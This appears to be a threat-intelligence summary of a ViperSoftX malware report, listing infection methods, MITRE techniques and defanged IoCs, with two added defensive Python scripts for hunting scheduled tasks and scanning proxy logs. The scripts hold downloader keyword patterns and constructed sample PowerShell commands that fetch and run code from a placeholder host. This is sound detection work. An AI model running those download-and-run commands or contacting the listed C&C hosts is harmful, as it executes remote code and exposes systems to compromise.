The ViperSoftX threat actor continues to distribute malware targeting cryptocurrency users, employing PowerShell scripts to install remote access tools and steal sensitive wallet information. The malware uses various infection methods, including disguised illegal software, and implements clipboard monitoring to capture cryptocurrency-related data. #ViperSoftX #QuasarRAT #PureCrypter #PureHVNC #ClipBanker
Keypoints
- ViperSoftX malware is distributed mainly via disguised cracked software, keygens, or torrent sites, affecting users globally including South Korea.
- It achieves persistence through the Task Scheduler, which periodically executes Base64-encoded PowerShell scripts and commands stored in the registry.
- The PowerShell scripts act as downloaders that communicate with C&C servers, in some cases retrieving the payload through DNS TXT record queries.
- ViperSoftX monitors clipboard content and active windows to steal cryptocurrency wallet addresses and BIP39 recovery phrases, sending stolen data via HTTP headers.
- The malware supports commands from the C&C server, including running PowerShell commands, downloading and executing additional executables, and removing itself, which gives the operator flexibility.
- Additional payloads distributed include Quasar RAT for remote access, PureCrypter as an executable loader with evasion features, and PureHVNC for system control.
- ClipBanker malware complements ViperSoftX by replacing copied cryptocurrency wallet addresses with attacker-controlled addresses to redirect transactions.
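The persistence and downloader behaviour described in the key points above (scheduled tasks that launch Base64-encoded PowerShell, commands read back from the registry, DNS TXT retrieval) can be hunted for in exported Task Scheduler actions. The following Python script is an added example, not code from the ASEC report: the task entries are constructed samples, the `c2.example.invalid` URL and the `HKCU:\Software\Example` key are placeholders, and the downloader keyword list is a generic set of PowerShell hunting indicators chosen for this example rather than signatures from the report.

```python
import base64
import re

# Generic PowerShell downloader/decoder indicators chosen for this example
# (assumption: a hunting keyword list, not signatures from the ASEC report).
DOWNLOADER_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
    r"net\.webclient", r"invoke-webrequest", r"frombase64string",
    r"resolve-dnsname[^|]*-type\s+txt", r"get-itemproperty",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|"
    r"encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)"
    r"\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def decode_encoded_command(args):
    """Return the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    match = ENCODED_FLAG.search(args)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_indicators(script):
    """Return the downloader patterns that occur in a case-folded script."""
    text = script.lower()
    return sorted(p for p in DOWNLOADER_PATTERNS if re.search(p, text))


def assess_task(name, command, args):
    """Classify one Task Scheduler action: command path plus argument string."""
    result = {"task": name, "encoded": False, "decoded": None, "indicators": []}
    if "powershell" not in command.lower():
        result["suspicious"] = False
        return result
    decoded = decode_encoded_command(args)
    if decoded is not None:
        result["encoded"] = True
        result["decoded"] = decoded
        result["indicators"] = find_indicators(decoded)
    else:
        result["indicators"] = find_indicators(args)
    # An encoded command in a scheduled task is itself worth review; otherwise
    # flag only when a downloader/decoder pattern is present.
    result["suspicious"] = result["encoded"] or bool(result["indicators"])
    return result


# Constructed sample (name, command, arguments) tuples shaped like Task
# Scheduler actions. The URL and the registry key are placeholders.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_TASKS = [
    ("Adobe Updater", PS,
     f"-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -enc {SAMPLE_ENCODED}"),
    ("Chrome Update", PS,
     r'''-NoP -W Hidden -c "IEX ([Text.Encoding]::UTF8.GetString('''
     r'''[Convert]::FromBase64String((Get-ItemProperty 'HKCU:\Software\Example').Blob)))"'''),
    ("Backup Maintenance", PS, r"-NoProfile -File C:\Scripts\backup.ps1"),
    ("Disk Cleanup", r"C:\Windows\System32\cleanmgr.exe", "/sagerun:1"),
]


def hunt(tasks=SAMPLE_TASKS):
    """Return the assessment records of every task worth an analyst's look."""
    return [r for r in (assess_task(*t) for t in tasks) if r["suspicious"]]


if __name__ == "__main__":
    for hit in hunt():
        print(hit["task"], "encoded" if hit["encoded"] else "plain", hit["indicators"])
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

To apply this to a real host, feed it the Execute/Arguments pairs from the Actions property of Get-ScheduledTask (or the output of schtasks /query /xml) and review the decoded script rather than the encoded blob; the registry-read pattern matters because the task itself can look harmless while the actual downloader sits in a registry value.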
MITRE Techniques
- [T1059] Command and Scripting Interpreter – Used PowerShell scripts to download additional payloads and execute commands (“The decrypted and executed PowerShell command is a downloader”).
- [T1071] Application Layer Protocol – Data exfiltration and C&C communication occur via HTTP headers ‘X-User-Agent’, ‘X-get’, and ‘X-notify’ (“Data transmitted to the C&C server is sent through the HTTP header fields”).
- [T1140] Deobfuscate/Decode Files or Information – Malware decrypts Base64 encoded PowerShell scripts from files and registry entries before execution (“…decrypts it into Base64, and then executes it”).
- [T1053] Scheduled Task/Job – Persistence is achieved by registering tasks in Task Scheduler to execute malicious scripts periodically (“ViperSoftX leverages task scheduler to periodically execute malicious PowerShell scripts”).
- [T1115] Clipboard Data – Clipboard monitoring is used to capture cryptocurrency wallet addresses and BIP39 recovery phrases (“ViperSoftX monitors the clipboard to check whether the BIP 39 recovery phrase… has been copied”).
- [T1083] File and Directory Discovery – Malware queries system information including installed browser extensions and programs (“It queries the lists of extensions of web browsers and installed programs and sends them to the C&C server”).
- [T1204] User Execution – Initial infection vectors include disguised cracked software and keygens encouraging user execution (“ViperSoftX was often distributed under the guise of cracked software or key generators”).
Indicators of Compromise
- [File Hashes] Examples of malware files – 064b1e45016e8a49eba01878e41ecc37, 0ed2d0579b60d9e923b439d8e74b53e1, and 3 more hashes.
- [URLs] Malware download sources – http://136[.]243[.]132[.]112/ut[.]exe, http://136[.]243[.]132[.]112[:]881/3[.]exe.
- [IP Addresses] Command and control servers – 136[.]243[.]132[.]112, 160[.]191[.]77[.]89, 185[.]245[.]183[.]74, 212[.]56[.]35[.]232, 89[.]117[.]79[.]31.
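The C&C header fields named under T1071 above and the defanged indicators in this list can be turned into one proxy-log check. The following Python script is an added example, not code from the ASEC report: the IoC strings and the header names X-User-Agent, X-get and X-notify are the ones given on this page, while the JSON-per-line log format, the internal source addresses, the 203.0.113.10 and 198.51.100.20 servers and all header values are constructed for the example. The header match is kept separate from the IoC match on purpose, since it catches the traffic pattern against a server that is not yet on any indicator list.

```python
import json
from urllib.parse import urlsplit

# Defanged indicators as listed on this page (refanged before matching).
DEFANGED_IOCS = [
    "http://136[.]243[.]132[.]112/ut[.]exe",
    "http://136[.]243[.]132[.]112[:]881/3[.]exe",
    "136[.]243[.]132[.]112", "160[.]191[.]77[.]89", "185[.]245[.]183[.]74",
    "212[.]56[.]35[.]232", "89[.]117[.]79[.]31",
]

# Header fields the report attributes to ViperSoftX C&C traffic (case-folded).
C2_HEADERS = {"x-user-agent", "x-get", "x-notify"}


def refang(ioc):
    """Undo the usual defanging so an indicator can be compared with live logs."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def build_ioc_sets(defanged):
    """Split indicators into exact URLs and hosts; URL hosts are added to hosts too."""
    urls, hosts = set(), set()
    for ioc in map(refang, defanged):
        if "://" in ioc:
            urls.add(ioc)
            hosts.add(urlsplit(ioc).hostname)
        else:
            hosts.add(ioc)
    return urls, hosts


def scan_line(line, url_iocs, host_iocs):
    """Return the list of reasons one JSON log record should be alerted on."""
    rec = json.loads(line)
    url = rec.get("url", "")
    host = urlsplit(url).hostname or ""
    names = {name.lower() for name in rec.get("headers", {})}
    reasons = []
    if url in url_iocs:
        reasons.append("url-ioc")
    if host in host_iocs or rec.get("dst_ip") in host_iocs:
        reasons.append("host-ioc")
    seen = sorted(names & C2_HEADERS)
    if seen:  # fires even when the server is absent from the IoC list
        reasons.append("c2-headers:" + ",".join(seen))
    return reasons


def scan(lines, defanged=DEFANGED_IOCS):
    """Return (src_ip, dst_ip, reasons) for every record that matches."""
    url_iocs, host_iocs = build_ioc_sets(defanged)
    alerts = []
    for line in lines:
        reasons = scan_line(line, url_iocs, host_iocs)
        if reasons:
            rec = json.loads(line)
            alerts.append((rec.get("src_ip"), rec.get("dst_ip"), reasons))
    return alerts


# Constructed proxy log, one JSON record per line. Internal addresses, the
# 203.0.113.10 / 198.51.100.20 servers and all header values are made up.
SAMPLE_LOG = [
    '{"ts": "2024-06-01T10:00:01Z", "src_ip": "10.0.0.5", "dst_ip": "136.243.132.112",'
    ' "url": "http://136.243.132.112/ut.exe", "headers": {"User-Agent": "Mozilla/5.0"}}',
    '{"ts": "2024-06-01T10:00:07Z", "src_ip": "10.0.0.7", "dst_ip": "203.0.113.10",'
    ' "url": "http://203.0.113.10/api/v2", "headers": {"User-Agent": "Mozilla/5.0",'
    ' "X-User-Agent": "Y29uc3RydWN0ZWQ=", "X-get": "1", "X-notify": "Y29uc3RydWN0ZWQ="}}',
    '{"ts": "2024-06-01T10:00:12Z", "src_ip": "10.0.0.9", "dst_ip": "198.51.100.20",'
    ' "url": "https://example.com/", "headers": {"User-Agent": "Mozilla/5.0"}}',
    '{"ts": "2024-06-01T10:00:20Z", "src_ip": "10.0.0.5", "dst_ip": "89.117.79.31",'
    ' "url": "http://89.117.79.31/", "headers": {"User-Agent": "Mozilla/5.0", "X-notify": "1"}}',
]

if __name__ == "__main__":
    for src, dst, reasons in scan(SAMPLE_LOG):
        print(f"{src} -> {dst}: {', '.join(reasons)}")
```

Host and destination-IP matching is exact rather than substring-based so that an indicator such as 136.243.132.112 cannot match an unrelated address that merely starts with the same digits; when a proxy logs the request headers, the c2-headers reason is the one to pivot on first, because it does not depend on the indicator list being current.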
Read more: https://asec.ahnlab.com/en/88336/